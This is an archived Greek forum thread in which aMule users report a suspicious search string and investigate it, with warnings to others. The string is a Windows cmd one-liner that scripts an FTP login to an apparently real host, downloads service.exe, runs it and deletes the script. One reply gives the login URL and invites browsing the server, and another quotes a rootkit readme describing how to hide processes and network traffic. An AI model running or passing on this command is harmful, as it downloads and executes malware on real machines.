Προς το περιεχόμενο

Alarm - Κάτι περίεργο με το emule


doubleh

Προτεινόμενες αναρτήσεις

Δημοσ.

Λοιπόν, έχω στο λίνουξ aMule (την linux εκδοχή του γνωστού eMule).

Το μηχάνημα αυτό το βλέπω με vnc από windows.

 

Λοιπόν, το είχα αφήσει να κατεβάζει, και μπαίνοντας σήμερα μέσω vnc στο λίνουξ, βλέπω το aMule να έχει κάνει αναζήτηση για το παρακάτω

 

%systemroot%\system32\cmd.exe del eq&echo open ftp9.b0b.org 21 >> eq&echo user dbrown menu303 >> eq &echo binary >> eq &echo get service.exe >> eq &echo quit >> eq &ftp -n -s:eq &service.exe &del eq

 

Όπως μπορείτε να καταλάβετε παίζει κάτι πολύ άσχημο. Ουσιαστικά κατεβάζει και εκτελέι ένα πρόγραμμα, το service.exe από το ftp9.b0b.org

 

Έχει συμβεί σε κανέναν κάτι παρόμοιο; Έχει κανείς ιδέα τι είναι αυτό το πράγμα;

Δημοσ.

Όποιος έχει όρεξη να το ψάξει τι είναι ας δώσει στη γραμμή διευθύνσεων του browser το

ftp://dbrown:[email protected]/

Η πόρτα 21 δεν χρειάζεται αφού είναι η default.

Το αρχείο είναι εκεί αλλά έχει και υποκαταλόγους με διάφορα άλλα καλούδια.

Δημοσ.

Είχες δίκιο πράγματι κάτι συμβαίνει.

Ο χώρος (link www) είναι γεμάτος από υλικό για να φτιάξει κανείς rootkits καθώς και πολλά έτοιμα.

Το antivirus (Nod) βρήκε και πολλές trojan εκδοχές (Madtol.A trojan κλπ.) σε αυτό το ftp site.

 

Ορίστε κι ένα απόσπασμα του readme.txt στον κατάλογο /www .

"This software generates a system patch that will hide processes, files, folders

registry keys and netstat entries from Windows 95/98/ME/NT/2k/XP/2003. Information

is withheld based on 4 lists of mask strings. This enables you to apply wildcards to

hiding functions such as hiding files based on "*.exe" or netstat entries based on

"*TCP*:80*" to hide http traffic.

 

The "example.exe" include is preconfigured to hide all processes/files and keys matching

"~~*" and all "*TCP*" traffic. The installer copies itself to the system directory and

extracts 2 DLL files from it's resources. It saves the files as "iexplore.exe" and

"explorer.exe". The first dll is loaded into "explorer.exe" which then installs hooks

contained in "explorer.dll"."

 

Πολύ κακό παιδί ο Daniel :devil:

 

:shifty::shifty::shifty: ΠΡΟΣΟΧΗ όσοι είστε users του amule :shifty::shifty::shifty:

 

Όσοι έχετε firewalls προς τον έξω κόσμο βάλτε νέο rule για αποκλεισμό κάθε επικοινωνίας με την IP 75.126.12.41 (ftp9.b0b.org) γιατί είναι γεμάτη με έτοιμα rootkits και εργαλεία για κατασκευή νέων.

Όλα αυτά μέχρι να βρείτε εναλλακτικό πρόγραμμα αντί του amule.

Πολύ κακό παιδί ο Daniel :devil:

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

  • Δημιουργία νέου...